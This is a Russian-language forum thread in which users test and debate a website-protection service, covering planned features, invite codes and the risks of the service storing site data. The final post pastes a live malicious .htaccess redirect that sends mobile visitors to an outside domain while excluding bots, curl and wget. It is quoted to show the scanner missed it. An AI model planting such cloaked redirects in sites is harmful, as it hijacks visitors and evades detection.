Сервис защиты сайтов - Тестеры нужны

TF-Studio
На сайте с 17.08.2010
Offline
321
#71

Согласен, идея данная весьма не айс.

Новые планы:

- Использование сигнатур айболита для анализа JS-скриптов ( с согласия автора)

- Редирект при переходе с поисковиков.

Важно:

Очень не рекомендую использовать mail.ru

Он стал опять помечать письма как спам, опять переписка и потеря уведомлений.

Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).
SV
На сайте с 03.11.2008
Online
1346
#72
TF-Studio:
Новые планы:
- Использование сигнатур айболита для анализа JS-скриптов ( с согласия автора)
- Редирект при переходе с поисковиков.

О! это дело :) Очень нужное дело.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Топики помощи с ⓌordPress (https://searchengines.guru/ru/forum/1032910 ) и основы безопасности сайтов ( https://searchengines.guru/ru/forum/774117 ). *** Помощь\консультации в топиках форума - БЕСПЛАТНО. Платные услуги ( https://wp.me/P3YHjQ-3 ) - с бюджетом от 150$ ***
TF-Studio
На сайте с 17.08.2010
Offline
321
#73

Порция инвайтов:

877f9f8bb813bee66ce9
87b768ecfcf622fb6dff
878e7b75db7caf4069de
87f32bde6c6f3ad4f14e
877eb8c650ea80509a38
юни
На сайте с 01.11.2005
Offline
848
#74
SeVlad:
А при перехвате злоумышленником инфы

Как такое возможно?

SeVlad:
в файлах, которые 90% оставят открытыми для паблика

Та же саповская папка с генерируемыми названиями - открыта для паблика? Почему нельзя пойти этим путём?

A-Parser - парсер для профессионалов (https://a-parser.com/) SEO, маркетологов, арбитражников и SaaS
SV
На сайте с 03.11.2008
Online
1346
#75
юни:
Как такое возможно?

Разными способами. В зависимости от способов хранения, передачи и обработке этой инфы. К тому же совсем не исключается взлом самого сервиса:

TF-Studio:
если меня похакают (а это может произойти с любым, ибо написать 100% неуязвимую систему нельзя), то злоумышленник, спустя какое-то время, может получить данные о

.. всех сайтах всех клиентов.

юни:
Почему нельзя пойти этим путём?

А смысл?

Ида, саповская папка менее интересная цель, нежели инфа о файловой структуре всего сайта.

юни
На сайте с 01.11.2005
Offline
848
#76
SeVlad:
Разными способами.

Если не известно имя файла, каналы и структура передаваемой информации, то что ещё можно сделать?

SeVlad:
совсем не исключается взлом самого сервиса

Что дадут хэш и/или зашифрованные данные злоумышленнику? Пути к файлам, содержимое файлов и всё остальное ведь из них не извлечёшь.

К тому же, здоровый уровень паранойи лично мне подсказывает, что актуальнее будет опасаться взлома самого ресурса, а не сервиса его защиты. Если

1) код клиентских скриптов и без того лежит в открытом доступе и выполняет минимум функций,

2) конкретные файлы шифруются и индивидуализируются для каждого защищённого сайта, а

3) взлом самого сервиса даст БД с абракадаброй в виде ID сайта без URL, и кучей зашифрованных значений для него, вида $5$4dRhhKytf3f9liv^^^DrGqcX73. И что с этим делать?

То бишь, мне не видно сейчас явно уязвимое место.

SV
На сайте с 03.11.2008
Online
1346
#77
юни:
Если не известно имя файла, каналы и структура передаваемой информации, то что ещё можно сделать?

1. Не факт, что не станет известно.

2. Не факт, что злоумышленник сможет завладеть не только "знаниями", а и не посредственно самими файлами. (я к тому, что само их наличие - потенциальная дыра)

3. Топик для обсуждения сервиса, а не обучалка взломов (тем более, что я не учитель)

юни:
Пути к файлам, содержимое файлов и всё остальное ведь из них не извлечёшь.

Было бы желание ;) Но да, смотря какой хеш.

юни:
К тому же, здоровый уровень паранойи лично мне подсказывает, что актуальнее будет опасаться взлома самого ресурса, а не сервиса его защиты.

А уровень простого здравого смысла что тебе подсказывает, отвечая на вопрос - чем, в плане безопасности, отличается сервис одиночки (в см не мегакорпораций типа гугла\МС\етс), крутящийся на серверах хенцера, от сайтов таких же одиночек или даже крупных компаний-клиентов сервиса? А о взломе того же твиттера или маилру или ещё 100500 гораздо более защищённых ресов ты тоже не слышал?

юни:
То бишь, мне не видно сейчас явно уязвимое место.

Я тебя успокою - ты совсем не одинок в этом. Тысячи или даже миллионы юзеров по всему миру пользуются сервисами, предлагающими залить себе шелл и спать спокойно :)

Если интересно - почитай топики, ссылки на которые я дал в 70 посте.

юни
На сайте с 01.11.2005
Offline
848
#78
SeVlad:
само их наличие - потенциальная дыра

В общем, надо предметно разговаривать. Этак любой .php можно обозвать потенциальной дырой.

И да, наличие на сервере, смотрящем в мир, Апача/IIE и .htaccess - тоже потенциальная дыра. При чём о-го-го какая.

d4k
На сайте с 02.03.2010
Offline
133
d4k
#79

забрал 87f32bde6c6f3ad4f14e. Будем посмотреть ;)

Продвижение сайтов в Одессе (http://seotop.in.ua/)
37
На сайте с 15.12.2011
Offline
15
#80

Один из сайтов подхватил мобильный редирект в .htaccess сервисом просканировал, но вирус сервис не нашел, хотя там банально в .htaccess был ред прописан.

Если нужно, то вот код редиректа

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]

RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]

RewriteRule (.*) http://m.extrasoftware.biz/?19&source=31.31.196.44 [L,R=302] # On

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий